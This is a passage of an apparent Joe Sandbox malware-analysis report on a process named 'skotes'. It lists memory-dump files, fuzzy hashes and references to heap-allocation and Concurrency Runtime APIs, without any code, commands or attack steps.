                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 01b8f7612ac8ba97a1144e63f7aa527a7d8b9471b3909804920283dd86ee8eaf
                                                                                                                • Instruction ID: 76d3e4a983e79e4f32a0ba0bb9c81419cd71478fbe57d0463365dd3718b41d68
                                                                                                                • Opcode Fuzzy Hash: 01b8f7612ac8ba97a1144e63f7aa527a7d8b9471b3909804920283dd86ee8eaf
                                                                                                                • Instruction Fuzzy Hash: 1F21D672905108BBEB217B68AC4ABEF3769EF41374F100355FA242B1D1DB7C9E058661
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007BA813,00000001,00000364,00000006,000000FF,?,?,0079D3FC,00796CB7,?,00797A8B,8B18EC84), ref: 007BD870
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: ce4a806bc57a15acd4ea17d3f0ac102f44c6a794b99744ac89d854d3b8cfc7f2
                                                                                                                • Instruction ID: 0a43c6ccd141d0612e2e6ff7268a44ffffa8c57c2c7ee50c337d6d6f482bfd2b
                                                                                                                • Opcode Fuzzy Hash: ce4a806bc57a15acd4ea17d3f0ac102f44c6a794b99744ac89d854d3b8cfc7f2
                                                                                                                • Instruction Fuzzy Hash: 84F02732605124A6EB312A76DC05BDB3759DF817B2B288021FD08EB191FA2CEC0086E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c606be57f27454d224076057ccedde6e0867169dc3c245320ded026b39322471
                                                                                                                • Instruction ID: e216d1291ede81b2ae00b459ab71ab81ae719da4a42c60beb3c4a5d9a0fc34f2
                                                                                                                • Opcode Fuzzy Hash: c606be57f27454d224076057ccedde6e0867169dc3c245320ded026b39322471
                                                                                                                • Instruction Fuzzy Hash: 2211D37B04D154FEE361C5456B0AAF677BAF68A730330855BF40B8A132D2540A9B9672
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea7d71d0f2320c2cca071383293a703e81e47c753c3008c4051b448257641726
                                                                                                                • Instruction ID: b5e8afa490c9d31dea126ac6d00d98234bf18b3db76c2a67c8bd06084c27e7fa
                                                                                                                • Opcode Fuzzy Hash: ea7d71d0f2320c2cca071383293a703e81e47c753c3008c4051b448257641726
                                                                                                                • Instruction Fuzzy Hash: C511B8AA048010FEA35AC5456B1EAF666FEF2C9731330821BF40E8A132C658498B9271
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 446b9df6293531b1f30050e4c29db7137e2058ee163f58a1d767bc52220eda61
                                                                                                                • Instruction ID: 51f78fd99b300b5a16c680630ddbde99396d158e91ba09e97ce732bae04a2782
                                                                                                                • Opcode Fuzzy Hash: 446b9df6293531b1f30050e4c29db7137e2058ee163f58a1d767bc52220eda61
                                                                                                                • Instruction Fuzzy Hash: 67019EAB14C010FEE352C5456B1EAF66AFFE1CA770331861BF80FC9131D255499B92B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 95cd33527eeb5dd9227b44541edf0e2176f7f5848d4547f89dd1ef253e57143c
                                                                                                                • Instruction ID: f2a94077f4ae41861fe8308299e2960f20b84f0b2dac70ab340bf7da8b14a00b
                                                                                                                • Opcode Fuzzy Hash: 95cd33527eeb5dd9227b44541edf0e2176f7f5848d4547f89dd1ef253e57143c
                                                                                                                • Instruction Fuzzy Hash: 32018CAA048111FDE366C5452B1AAF66AFFE1CA730330861BF84FC9532C2550A9B9271
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b3a0d23905546bc6ffaeb0f8edefa5e779642b1627109f40f9ab86c263b05a56
                                                                                                                • Instruction ID: 27658416cfab629d33fbbc36e1efeabc5c31decc39be8da041ea2d4234789d4b
                                                                                                                • Opcode Fuzzy Hash: b3a0d23905546bc6ffaeb0f8edefa5e779642b1627109f40f9ab86c263b05a56
                                                                                                                • Instruction Fuzzy Hash: 5201DFAF14C110FEE351C5456B1AAF66BFFE1C97303308617F84FCA122C2950A8B9271
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 171ec695d2d135bc5546b58f22671bcd2ddea9579bbbabc38270b6993045ab48
                                                                                                                • Instruction ID: 5583d9a3f80b49767ec04c69fbb3ab82f5c52a7bc6cfd978a9409a7991e89cae
                                                                                                                • Opcode Fuzzy Hash: 171ec695d2d135bc5546b58f22671bcd2ddea9579bbbabc38270b6993045ab48
                                                                                                                • Instruction Fuzzy Hash: 8E01A7BF14D050BEE35189552E1EAFA67EEF5CA730735852BF80BC5421C258094B9631
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a0941d9db8b710734750e82bcf72f421fe7f0abab39b105cd371ff1b8f042b7f
                                                                                                                • Instruction ID: a65198af979a94a02aed0faed2e5c7bcecda13a370e3c3042f969f06e4628b00
                                                                                                                • Opcode Fuzzy Hash: a0941d9db8b710734750e82bcf72f421fe7f0abab39b105cd371ff1b8f042b7f
                                                                                                                • Instruction Fuzzy Hash: 5801D1BF148040BEF351CA556E1EAFE67EEF6CA7307308A1BF81BC5461C2550A8B9631
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 509a58e59d1fe19b02526d92431cf1599009717333ec116824c2af066c693ab0
                                                                                                                • Instruction ID: 3cfb2b55d88c13df7ee17c7b4629654705d4f70cac7244951396636fa31d2767
                                                                                                                • Opcode Fuzzy Hash: 509a58e59d1fe19b02526d92431cf1599009717333ec116824c2af066c693ab0
                                                                                                                • Instruction Fuzzy Hash: 3DF04FAF148010FEE351C5456B1AAF66BEFE1D9730331861BF80FD5521C2590A9B9231
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4812bb4405912920a781e4b826591cb90b67453c174f2da9b76de2db01e42c96
                                                                                                                • Instruction ID: 94f68884ecacf6db368ba0d05ecbb6d0dcf3bfc31c5b24059dfe0694a837b837
                                                                                                                • Opcode Fuzzy Hash: 4812bb4405912920a781e4b826591cb90b67453c174f2da9b76de2db01e42c96
                                                                                                                • Instruction Fuzzy Hash: 88F030BF148050BDF351C5417F1ABFB67EEE1C8730770891BF40EC4821C2591A9A9631
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a74e56f0471f65654f598b5c2fcbaca99d873843578c81c9dba8de87868843fd
                                                                                                                • Instruction ID: 43591850c583ac9cc017c9e8f082ebdf778f0ad03a0433a33f383b10387c9be5
                                                                                                                • Opcode Fuzzy Hash: a74e56f0471f65654f598b5c2fcbaca99d873843578c81c9dba8de87868843fd
                                                                                                                • Instruction Fuzzy Hash: 8AE0E57F108010FDE341C9466A19AFB63EEE5C87303308A1BF40AC5016C749168ED672
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_5430000_skotes.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d06714edf550ae970daa7a67129a920e1e033a68916b831011ab8007e1e8f94
                                                                                                                • Instruction ID: a7107218df09d5e0e1814adf0aee5a440da4b5c091b627d5f502bbad190e8bbc
                                                                                                                • Opcode Fuzzy Hash: 6d06714edf550ae970daa7a67129a920e1e033a68916b831011ab8007e1e8f94
                                                                                                                • Instruction Fuzzy Hash: 39D022AF40D064BCB3A0C0452B0BBF352CFA1CCB303718617F80AC6461E20A184A6070
                                                                                                                APIs
                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A0F16
                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A0F62
                                                                                                                  • Part of subcall function 007A265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 007A2750
                                                                                                                • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 007A0FCE
                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A0FEA
                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A103E
                                                                                                                • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A106B
                                                                                                                • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 007A10C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2943730970-3887548279
                                                                                                                • Opcode ID: 9531fcdcb6b65580ec67af5569df2de8c5de86817819c268295ad5998fd7559f
                                                                                                                • Instruction ID: 371e56bbaf1fe685a82353e79f6e26f864e8a0b7f8a1de39ff48b4aa3cb2d768
                                                                                                                • Opcode Fuzzy Hash: 9531fcdcb6b65580ec67af5569df2de8c5de86817819c268295ad5998fd7559f
                                                                                                                • Instruction Fuzzy Hash: E8B17FB0A01615EFDB28CF58D980B7AB7B5FF89304F14866DE905AB641D338ED81CB94
                                                                                                                APIs
                                                                                                                  • Part of subcall function 007A2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 007A2D0F
                                                                                                                • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 007A1614
                                                                                                                  • Part of subcall function 007A2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 007A2E39
                                                                                                                  • Part of subcall function 007A2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 007A2EA8
                                                                                                                • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 007A1746
                                                                                                                • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 007A17A6
                                                                                                                • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 007A17B2
                                                                                                                • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 007A17ED
                                                                                                                • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 007A180E
                                                                                                                • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 007A181A
                                                                                                                • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 007A1823
                                                                                                                • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 007A183B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
